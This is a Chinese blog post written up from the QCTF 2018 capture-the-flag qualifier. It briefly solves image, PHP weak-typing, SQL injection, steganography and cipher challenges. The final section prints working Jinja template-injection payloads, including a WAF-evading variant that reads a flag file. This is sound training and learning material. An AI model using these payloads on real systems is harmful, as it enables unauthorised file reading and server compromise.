QCTF 2018xman夏令营选拔赛

小肉鸡太菜了,就只做了三题orz.......

QCTF 2018xman夏令营选拔赛_第1张图片

x-man-a-face

这题挺简单的,拿到一个图片,看见有个二维码

QCTF 2018xman夏令营选拔赛_第2张图片

发现少了两个定位点,用photoshop补全

QCTF 2018xman夏令营选拔赛_第3张图片

扫一下就出来一串KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=

然后base32解码就行了

Lottery

这题是弱类型匹配,进去看到一个规则

QCTF 2018xman夏令营选拔赛_第4张图片

后面还有一个地方可以买flag

QCTF 2018xman夏令营选拔赛_第5张图片

很贵orz

然后看robots.txt看到有.git泄露,把代码down下来,看api.php可以看到,要猜的7个数字其实是字符,然后它是一个个匹配过去的,所以就构造json数组,全部true过去绕过

然后就发财了,哈哈哈

高高兴兴地买flag咯

NewsCenter

emmm,这题是题大水题,post方法,sqlmap跑一波就都出来了

QCTF 2018xman夏令营选拔赛_第6张图片

剩下的....没了,虽然我也想做多几题,但是小肉鸡真的是太菜了

QCTF 2018xman夏令营选拔赛_第7张图片

剩下的题还是要补一补,还是大佬教了才会做(我怎么这么菜啊.............

x-man-keyword

这题大佬后来说了是lsb隐写,那就去做了

然后就可以得到这串东西

剩下的就是关键词加密,因为已经知道了关键词是lovectf,所以可以得到一个对应的解密表

对着解密就出flag了

Confusion1

这题是考jinja模板注入,其实题目不是很难,不过waf有点麻烦,绕的有点多

源码可以看到

执行命令是这一句{{''.class.mro[2].subclasses()[40]('opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read()}}

绕完waf是这一句{{''['__cla'+'ss__']['__mr'+'o__'][2]['__subcla'+'sses__']()[40]('opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').next()}}

有毒啊................

你可能感兴趣的:(ctf)